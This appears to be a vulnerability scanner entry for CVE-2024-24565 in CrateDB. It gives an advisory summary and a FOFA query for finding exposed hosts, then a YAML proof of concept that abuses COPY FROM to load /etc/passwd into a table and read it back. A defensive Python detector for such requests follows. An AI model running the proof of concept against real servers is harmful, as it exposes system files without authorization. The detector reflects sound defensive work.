CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1.
fofa: title="CrateDB"
PoC code [publicly available]
id: CVE-2024-24565

info:
  # name in English: CrateDB database arbitrary file read vulnerability
  name: CrateDB数据库任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1.
    fofa: title="CrateDB"
  reference:
    - https://mp.weixin.qq.com/s/43ciyt7QFR3k3kjdfxZ7kQ
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24565
  tags: cve,cve2024,fileread
  created: 2024/02/21

set:
  tablename: randomLowercase(8)

rules:
  r0:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"CREATE TABLE {{tablename}}(info_leak STRING)"}
    expression: response.status == 200
  r1:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"COPY {{tablename}} FROM '/etc/passwd' with (format='csv', header=false)"}
    expression: response.status == 200
  r2:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"SELECT * FROM {{tablename}} limit 10"}
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

expression: r0() && r1() && r2()
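
A defender-side check for the request pattern in rule r1 above, as an added example that is not part of the original PoC or of CrateDB: it scans JSON bodies sent to /_sql for COPY ... FROM statements whose source is a local path outside an expected import directory. The allow-listed directory, the record fields (src, path, body) and the sample records are assumptions constructed for illustration.

```python
import json
import posixpath
import re
from urllib.parse import urlparse

# Assumption: the only directory legitimate local imports are read from.
ALLOWED_IMPORT_DIRS = ("/data/import/",)

# Source of COPY ... FROM: a quoted literal (group 1) or any other token (group 2).
COPY_FROM = re.compile(r"\bCOPY\s+.+?\s+FROM\s*(?:'((?:[^']|'')*)'|(\S+))", re.I | re.S)

def flagged_sources(stmt):
    """Return COPY FROM sources in stmt that read outside the allowed dirs."""
    hits = []
    for literal, other in COPY_FROM.findall(stmt):
        if other:  # not a quoted literal: value unknown, flag conservatively
            hits.append("non-literal:" + other)
            continue
        parsed = urlparse(literal.replace("''", "'"))
        if parsed.scheme not in ("", "file"):
            continue  # remote source such as s3:// or https://, not a local read
        path = posixpath.normpath(parsed.path)  # collapses ../ segments
        if not path.startswith(ALLOWED_IMPORT_DIRS):
            hits.append(path)
    return hits

def audit(requests):
    """Return (client, source) pairs for flagged statements sent to /_sql."""
    findings = []
    for req in requests:
        if not req["path"].startswith("/_sql"):
            continue
        try:
            stmt = str(json.loads(req["body"]).get("stmt", ""))
        except (ValueError, AttributeError):
            continue  # body is not a JSON object
        findings += [(req["src"], s) for s in flagged_sources(stmt)]
    return findings

def _req(src, stmt):  # builds one constructed request record
    return {"src": src, "path": "/_sql?types", "body": json.dumps({"stmt": stmt})}

SAMPLE = [  # constructed records, not captured traffic
    _req("198.51.100.7", "COPY abcdefgh FROM '/etc/passwd' with (format='csv', header=false)"),
    _req("198.51.100.7", "COPY t FROM 'file:///data/import/../../etc/hostname'"),
    _req("198.51.100.7", "COPY t FROM ?"),
    _req("10.0.0.5", "COPY metrics FROM 'file:///data/import/2024-02.json'"),
    _req("10.0.0.5", "COPY metrics FROM 's3://example-bucket/metrics.json'"),
]
```

Calling audit(SAMPLE) returns the first three records' sources; the allow-listed file import and the s3:// import are not flagged.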